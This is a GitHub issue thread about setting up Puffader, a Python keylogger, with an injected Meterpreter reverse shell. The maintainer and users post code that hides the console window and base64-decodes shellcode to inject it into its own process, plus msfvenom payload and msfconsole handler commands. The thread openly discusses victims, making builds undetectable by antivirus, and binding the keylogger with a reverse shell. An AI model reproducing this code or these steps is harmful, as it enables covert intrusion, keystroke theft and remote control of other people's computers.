Closed joker8989 closed 6 years ago
Check the readme. I included instructions for a undetectable meterpreter shell since it injects the shellcode into puffader itself, so the actual reverse shell never touches disk.
Ohh ty did not notice..
But will the puffader run on the victim system i know myself how to create FUD py file (or meterpreter)???
Yeah it will.
Hey man i have some issues with set this up :
the file that's created is pyc and can't convert to exe ... (i think the error: compile():string without null bytes..")
any kind of help?
You don't run Puffader_Code_Addition. Did you make sure to move the code_injector module to same dir when compiling?
Your should look something like this:
def hide():
window = win32console.GetConsoleWindow()
win32gui.ShowWindow(window, 0)
return True
# hide window as new thread. Necessary in order to define timer used later
objTimer = threading.Timer(0, hide); objTimer.start()
# function to prevent multiple instances
mutex = win32event.CreateMutex(None, 1, "PA_mutex_xp4")
if win32api.GetLastError() == winerror.ERROR_ALREADY_EXISTS:
mutex = None
import code_injector, base64
# base64 shellcode
b64shellcode = "/OiCAAAAYInlMcBki1Awi1IMi1fYDffg7fSR15FiLWCQB02aLDEuLWBwB04sEiwHQiUQkJFtbYVlaUf/gX19aixLrjV1oMzIAAGh3czJfVGhMdykAEAACnEVFBoKYBrAP/VagpowKgKI2gCABFcieZQUFBQQFBAUGjqD9/g/9WXahBWV2iZpXRh/9WFwHQK/0ezoYQAAAGoAagRWV2gC2chf/9WD+AB+Nos2akBoABAAAFZqAGhYpFPl/9WTU2oAVlNXaALZyF//1YP4AH0iWGgAQAAAagBQaAsvDzD/1VdodW5NYf/VXl7/DCTpcf///wHDKcZ1x8O78LWiVmoAU//V"
shellcode = base64.b64decode(b64shellcode) # decrypt shellcode
pid = os.getpid() # get current pid
code_injector.InjectShellCode(pid, shellcode)
def GetExIp(): # function to get external ip
global strExIP
strExIP = urlopen("").read().decode('utf8')
strExIP = "?"
# obj defined for later use for screenshot timer
objTimer2 = threading.Timer(0, GetExIp); objTimer2.start()
Yep there r in the same location (like i downloaded it) puuf_code_addion and code_injector r in the same place... But did i type it right?
msfvenom -p windows/shell_reverse_tcp LHOST=a.b.c.d LPORT=4444 -f c
Can u please tell me the steps how to do it its not clear in the readme :(
yeah the msfvenom command is right. the puffader_code_addition is just the code that needs to be added to the actual You dont need a pyc file. Py2exe will automatically include the code_injector module as long as its in the same dir.
Can you show me your code?
Yea when i ll back home like in 2 hours..
ok so what did i do : (before pasting the code)
generate shellcode : msfvenom -p windows/shell_reverse_tcp LHOST=a.b.c.d LPORT=4444 -f c
run with the shellcode inside...
move the all files in the same dir
paste the to between function hide and function getEXip..
what's generated from is : python
the real code:
def hide():
window = win32console.GetConsoleWindow()
win32gui.ShowWindow(window, 0)
return True
# hide window as new thread. Necessary in order to define timer used later
objTimer = threading.Timer(0, hide); objTimer.start()
# function to prevent multiple instances
mutex = win32event.CreateMutex(None, 1, "PA_mutex_xp4")
if win32api.GetLastError() == winerror.ERROR_ALREADY_EXISTS:
mutex = None
import os, code_injector, base64
# base64 shellcode
b64shellcode = "aW1wb3J0IGJhc2U2NCxzIgoieXM7ZXhlYyhiYXNlNjQuIgoiYjY0ZGVjb2RlKHsyOnN0IgoiciwzOmxhbWJkYSBiOmJ5IgoidGVzKGIsJ1VURi04Jyl9IgoiW3N5cy52ZXJzaW9uX2luIgoiZm9bMF1dKCdhVzF3YjNKIgoiMElITnZZMnRsZEN4emRIIgoiSjFZM1FzZEdsdFpRcG1iIgoiM0lnZUNCcGJpQnlZVzVuIgoiWlNneE1DazZDZ2wwY25rIgoiNkNna0pjejF6YjJOclpYIgoiUXVjMjlqYTJWMEtESXNjIgoiMjlqYTJWMExsTlBRMHRmIgoiVTFSU1JVRk5LUW9KQ1hNIgoidVkyOXVibVZqZENnb0oyIgoicHZhMlZ5T0RnNE9DNWtiIgoibk0xTXk1aWFYb25MRFEwIgoiTkRRcEtRb0pDV0p5WldGIgoickNnbGxlR05sY0hRNkNnIgoia0pkR2x0WlM1emJHVmxjIgoiQ2cxS1Fwc1BYTjBjblZqIgoiZEM1MWJuQmhZMnNvSno1IgoiSkp5eHpMbkpsWTNZb05DIgoia3BXekJkQ21ROWN5NXlaIgoiV04yS0d3cENuZG9hV3hsIgoiSUd4bGJpaGtLVHhzT2dvIgoiSlpDczljeTV5WldOMktHIgoid3RiR1Z1S0dRcEtRcGxlIgoiR1ZqS0dRc2V5ZHpKenB6IgoiZlNrSycpKSk="
shellcode = base64.b64decode(b64shellcode) # decrypt shellcode
pid = os.getpid() # get current pid
code_injector.InjectShellCode(pid, shellcode) # inject the shellcode into the program
def GetExIp(): # function to get external ip
global strExIP
strExIP = urlopen("").read().decode('utf8')
strExIP = "?"
# obj defined for later use for screenshot timer
objTimer2 = threading.Timer(0, GetExIp); objTimer2.start()
I just built it with no problems.
btw instead of windows/shell_reverse_tcp
, windows/meterpreter/reverse_tcp
is better.
And u got a connection from the client? I will look at this soon very strange i am glad to hear that's it only for me not working...
i succeded i created exe file with pyinstaller with meterpreter/reverse_tcp ....
but i dont get a connection i execute the program set in the msfconsole all i need and nothing...
i get always "the program sttoped working"
can someone help me? i get always
"file.exe has stopped working"
tried to convert with pyinstaller and py2exe... did someone get a connection from the puufader file that include meterpreter plugin?
Do u have skype ? It will be more easier to resolve the problem...
Next time edit your comments as one. For msfconsole did you make sure to type:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LPORT 4444
set ExitOnSession false
exploit -j -z
I don't have skype unfortunately, but I have your email.
Of course i did it... except setExitSession false So send me a email to have u and i will send u avideo or something its will be more easy..
but its not explaning the reason that the "program has stopped working...."
@xp4xbox what's your email?
Hey i wanted to know if someone know how to bind the puufader keylogger with a reverse shell (get full access to the system - don't ask me why use reverse) and the keylogger is for keystrokes from every client/bot/slave i get...
the big problem is when i try to bind files is that AV runs 15 seconds of scans file (so the victim does need to be smart that he has been hacked.. )